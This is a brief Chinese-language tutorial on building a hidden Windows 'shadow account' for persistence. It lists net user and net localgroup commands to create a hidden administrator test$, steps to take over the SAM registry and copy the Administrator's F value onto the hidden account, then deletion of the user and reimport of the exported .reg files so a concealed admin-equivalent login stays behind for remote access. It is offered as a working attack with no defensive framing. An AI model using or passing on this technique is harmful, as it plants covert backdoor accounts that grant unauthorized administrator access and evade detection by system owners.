创建影子账户

1、创建隐藏用户并加入管理员组

net user test$ P@ssw0rd /add

net localgroup administrators test$ /add 

2、运行regeditd打开注册表

对HKEY_LOCAL_MACHINE\\SAM\\SAM右键->权限赋予当前用户administrator的具有完全控制和读取权限

3、修改注册表内容

重新打开注册表，定位到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names

查看administrator对应的键值为1f4和隐藏账户test$的键值为3e8

然后在Users中找到对应数字的F值，将3e8的F值替换为1f4的F值

 

 

4、导出注册表内容

将000001F4和000003E8按顺序导出为1.reg、2.reg

5、使用命令行删除隐藏用户

net user test$ /del

6、按顺序执行刚才导出的两个reg文件，重新导入

regedit /s 1.reg

regedit /s 2.reg

7、使用test$用户远程连接。